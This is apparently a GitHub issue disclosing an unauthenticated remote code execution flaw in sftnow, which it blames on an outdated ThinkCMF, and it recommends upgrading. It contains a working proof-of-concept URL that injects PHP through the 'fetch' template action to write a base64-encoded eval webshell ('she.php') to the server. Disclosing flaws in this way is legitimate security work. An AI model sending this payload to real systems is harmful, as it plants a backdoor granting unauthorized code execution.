there is a Remote Code Execution Vulnerability

version: sftnow through 2018-12-29

There is a Remote Code Execution Vulnerability without login.
Beacuse Framework used thinkcmf version is too low，it incloud a rce vulnerability.
POC：
``` txt
http://127.0.0.1:8888/?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('she.php',base64_decode('PD9waHAgZXZhbCgkX1BPU1RbJ3gnXSk7Pz4='))</php>
```
after send the poc  you can see the webshell  she.php
<img width="1043" alt="1" src="https://user-images.githubusercontent.com/37523122/72679192-d1352980-3ae7-11ea-85d2-3a178eedfb58.png">

suggest:update thinkcmf version

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

there is a Remote Code Execution Vulnerability #8

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

there is a Remote Code Execution Vulnerability #8

Description

Metadata

Metadata

Assignees

Labels

Projects

Milestone

Relationships

Development

Issue actions